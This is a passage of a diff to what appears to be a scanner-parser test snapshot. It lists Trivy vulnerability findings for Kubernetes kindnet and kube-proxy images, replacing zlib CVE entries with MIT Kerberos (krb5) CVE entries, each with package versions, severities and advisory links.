"https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.2", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-3121", - "installedVersion": "v1.3.1", - "packageName": "github.com/gogo/protobuf", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3121", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", - "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", - "https://github.com/advisories/GHSA-c3h9-896r-86jm", - 